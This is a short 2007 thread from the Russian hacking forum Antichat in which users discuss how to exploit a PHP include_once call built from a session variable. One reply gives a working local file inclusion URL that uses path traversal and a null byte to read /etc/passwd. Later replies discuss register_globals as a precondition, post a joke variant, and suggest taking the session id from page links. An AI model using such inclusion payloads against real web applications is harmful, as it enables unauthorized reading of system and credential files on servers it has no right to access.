Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - include (https://forum.antichat.xyz/showthread.php?t=42651)

guest3297

20.06.2007 06:01

include

Цитата:

18: include_once("../web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;

у кого какие мысли?
можно раздрочить?

hhover

20.06.2007 10:41

Код:

/script.php?sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00

_Great_

20.06.2007 10:47

hhover, здорово, только вот если register_globals=off...

KEZ	20.06.2007 11:45

надо тогда так

Код:

/script.php?REGISTER_GLOBALS=ON&sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00

=\\\\\\\

SMiX	20.06.2007 12:23

Ну просто отрубаем куки и смотрим sid в адресах ссылок на странице.

GreenBear

20.06.2007 12:26

кез, ты забыл ini_set )

Время: 21:54